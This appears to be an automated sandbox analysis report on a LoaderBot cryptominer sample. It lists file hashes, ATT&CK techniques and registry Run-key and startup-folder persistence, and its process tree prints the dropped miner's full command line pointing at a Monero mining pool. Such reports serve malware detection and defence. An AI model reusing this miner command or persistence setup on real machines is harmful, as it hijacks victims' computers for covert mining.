loaderbot | edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669

Analysis

max time kernel
178s
max time network
197s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
08/05/2022, 22:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
Size

2.9MB
MD5

012f0b24edc0229cde14c6ea38f25044
SHA1

ae5143c5744f9cd4d97b0df86911b6fcf740214e
SHA256

edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669
SHA512

ff94a226ffdeda9ac2860cca28152d9e0367f39e61e152186b76292b479091dcb03503eb92f732b5dd25db1b873d9068e262cd0f7522bda8e7ba91c43a926c7e

Score

10^/10

loaderbot loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

LoaderBot executable 1 IoCs

resource	yara_rule
behavioral2/memory/4608-137-0x00000000009E0000-0x00000000011F6000-memory.dmp	loaderbot

Executes dropped EXE 4 IoCs

pid	Process
4608	Miner Asazello Soft.exe
312	launch64.exe
4480	Driver.exe
1880	Driver.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	Miner Asazello Soft.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Miner Asazello Soft.exe

Loads dropped DLL 1 IoCs

pid	Process
4216	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Miner Asazello Soft.exe"	Miner Asazello Soft.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3080	4480	WerFault.exe	85

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe
4608	Miner Asazello Soft.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4608	Miner Asazello Soft.exe
Token: SeLockMemoryPrivilege	1880	Driver.exe
Token: SeLockMemoryPrivilege	1880	Driver.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4608	Miner Asazello Soft.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4216 wrote to memory of 4608	4216	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	82
PID 4216 wrote to memory of 4608	4216	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	82
PID 4216 wrote to memory of 4608	4216	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	82
PID 4216 wrote to memory of 312	4216	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	81
PID 4216 wrote to memory of 312	4216	edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe	81
PID 4608 wrote to memory of 4480	4608	Miner Asazello Soft.exe	85
PID 4608 wrote to memory of 4480	4608	Miner Asazello Soft.exe	85
PID 4608 wrote to memory of 1880	4608	Miner Asazello Soft.exe	90
PID 4608 wrote to memory of 1880	4608	Miner Asazello Soft.exe	90

C:\Users\Admin\AppData\Local\Temp\edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe
"C:\Users\Admin\AppData\Local\Temp\edca4bfaa09985c54732f8a0d1023d6a3f8b6665e905ac82ec3f583c67a5c669.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4216
- C:\Users\Admin\AppData\Roaming\1337\launch64.exe
  "C:\Users\Admin\AppData\Roaming\1337\launch64.exe"
  2⤵
  - Executes dropped EXE
  PID:312
- C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe
  "C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    PID:4480
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4480 -s 364
      4⤵
      Program crash
      PID:3080
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 1
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1880

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4480 -ip 4480
1⤵
PID:1884

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsu134B.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe

Filesize
3.1MB

MD5
7567e0843e8dba94e2cef2c8950d2142

SHA1
a15622d460ea78774c64fc4861855b1a4f15d856

SHA256
0a00cd6b0b16daeb30e89fad8af9ca56deaebe174e2ae49c71950ca1b05af26c

SHA512
0fd88b2dfbcad30010a1d4123e29a91d6c8f5c2d32a9a9657320dfb589a60dac0175c62328db67d46418e6f895e6d5a8c3e85da61d4bf2e78c58281607a2297e

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe

Filesize
3.1MB

MD5
7567e0843e8dba94e2cef2c8950d2142

SHA1
a15622d460ea78774c64fc4861855b1a4f15d856

SHA256
0a00cd6b0b16daeb30e89fad8af9ca56deaebe174e2ae49c71950ca1b05af26c

SHA512
0fd88b2dfbcad30010a1d4123e29a91d6c8f5c2d32a9a9657320dfb589a60dac0175c62328db67d46418e6f895e6d5a8c3e85da61d4bf2e78c58281607a2297e

Download Submit
C:\Users\Admin\AppData\Roaming\1337\launch64.exe

Filesize
5KB

MD5
c4058a8f14764847f3b6d80ec64216ce

SHA1
8701b828da7b599e6e883200d33d3004e4bbf5df

SHA256
dc1c764312aeef02b69bf71ceddcbee2525a776c910a1346a85c81db7a082c62

SHA512
4608dedb3ba910b7a7df9d55ea7e2752f92c58df6d43e61fe299e5b7856012cf3ffb9fe780b7988d0e18f57abdd0502fc64334d2a97815991f502e45b63ea23b

Download Submit
C:\Users\Admin\AppData\Roaming\1337\launch64.exe

Filesize
5KB

MD5
c4058a8f14764847f3b6d80ec64216ce

SHA1
8701b828da7b599e6e883200d33d3004e4bbf5df

SHA256
dc1c764312aeef02b69bf71ceddcbee2525a776c910a1346a85c81db7a082c62

SHA512
4608dedb3ba910b7a7df9d55ea7e2752f92c58df6d43e61fe299e5b7856012cf3ffb9fe780b7988d0e18f57abdd0502fc64334d2a97815991f502e45b63ea23b

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/4480-142-0x00000000001D0000-0x00000000001E4000-memory.dmp

Filesize
80KB

Download
memory/4608-137-0x00000000009E0000-0x00000000011F6000-memory.dmp

Filesize
8.1MB

Download
memory/4608-138-0x0000000006430000-0x0000000006496000-memory.dmp

Filesize
408KB

Download